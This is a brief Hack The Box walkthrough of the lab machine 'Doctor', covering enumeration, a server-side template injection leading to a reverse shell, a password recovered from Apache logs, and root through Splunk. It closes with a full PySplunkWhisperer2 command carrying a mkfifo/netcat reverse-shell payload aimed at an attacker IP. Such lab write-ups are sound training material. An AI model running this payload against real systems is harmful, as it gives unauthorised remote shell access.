3 min readMay 22, 2022

Doctor- Hack The Box

Introduction

Doctor is an easy Linux HackTheBox level machine. In the user part, we will see the SSTI injection. We have to look at some log files to obtain the password. In the root part, we will exploit Splunk.

Enumeration

In the nmap we have found 3 open ports 22,80,8089.

Visiting port 80 shows that the new domain is doctors.htb.

We have added the doctors.htb in the/etc/hosts file.

Here we can see the login page.

We have created the account to log in.

Exploit the SSTI

We can create a new post.

We tried a small SSTI code to check whether the application is vulnerable or not.

In the source code, we can see that there is a directory called Archive.

We check the archive directory and we can see our SSTI injection worked perfectly.

Now it's time to gain a reverse shell. We used one linear reverse shell script.

We have got a reverse shell.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Finding Password in Logs

After enumerating files and logs, we managed to find something interesting. In /var/log/apache2/backup, a reset password post request was made and ‘Guitar123’ was seen on the email parameter

Switch to Shaun's user and got the user flag.

Privilege Escalation

Run linpeas.sh reveals splunkforwarder in /opt directory. Splunk is running as a root on 8089 port.

#Command
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.59 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.59 443 >/tmp/f'